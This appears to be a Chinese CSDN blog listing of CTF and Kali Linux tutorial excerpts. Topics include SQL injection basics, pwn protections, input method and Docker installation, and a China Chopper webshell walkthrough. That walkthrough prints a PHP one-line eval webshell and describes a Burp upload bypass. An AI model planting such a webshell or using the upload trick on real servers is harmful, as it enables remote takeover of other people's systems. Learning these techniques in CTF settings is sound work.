![](https://img-blog.csdnimg.cn/20201014180756919.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
kali
博闻善行
博识而众享,则积微成著!
展开
-
ctf中国菜刀连接一句话木马
中国菜刀下载地址,试了好几个版本的就这个好用:https://pan.baidu.com/share/link?shareid=871753024&uk=388464620上传一句话木马:<?php @eval($_POST['hacker'])?>将一句话木马另存为one.jpg,通过Burp抓包改包上传为one.php通过菜刀连接:在空白位置右键-》添加...原创 2020-05-06 22:29:10 · 6775 阅读 · 0 评论 -
CTF-WEB总结之SQL注入
简介SQL注入漏洞的原理是由于开发者在编写操作数据库代码时,直接将外部可控的参数拼接到SQL语句中,没有经过任何过滤或过滤不严谨,导致攻击者可以使恶意语句在数据库引擎中执行。Union注入利用内置函数爆数据库信息及相关信息version()database()user()current_user()@@datadir数据库路径@@basedir mysql安装路径@@ver...原创 2020-05-01 18:18:21 · 684 阅读 · 0 评论 -
kali安装搜狗输入法
Kali上没有中文输入法,安装搜狗输入法的过程总是报错,也是服了首先下载搜狗输入法使用chmod +x sogoupinyin***.deb给安装包添加可执行权限这里可以看到添加权限之后颜色会变化然后使用安装deb包的命令进行安装dpkg -i sogoupinyin.deb结果很不幸报错看一下错误提示,关于fcitx的一些东西好像是没有安装,fcitx是一个输入法系统,sogo...原创 2020-03-15 16:03:46 · 868 阅读 · 0 评论 -
ctf-pwn入门知识
CTF中的pwn指的是通过通过程序本身的漏洞编写利用脚本破解程序拿到主机的权限了解简单的软件防护技术:栈保护:Canary堆栈不可执行:NX(No-eXecute)地址随机化:PIE(position-independent executable, 地址无关可执行)或者叫ALSR(address space layout randomization)ROP(Return-Oriented...原创 2020-04-06 17:00:23 · 2710 阅读 · 0 评论 -
kali安装docker
1.liunx下离线安装dockerhttps://www.cnblogs.com/luoSteel/p/10038954.htmlDocker安装1、解压tar -xvf docker-18.06.1-ce.tgz2、将解压出来的docker文件内容移动到 /usr/bin/ 目录下cp docker/* /usr/bin/3、将docker注册为servicevim /etc/...原创 2020-04-05 13:20:37 · 651 阅读 · 0 评论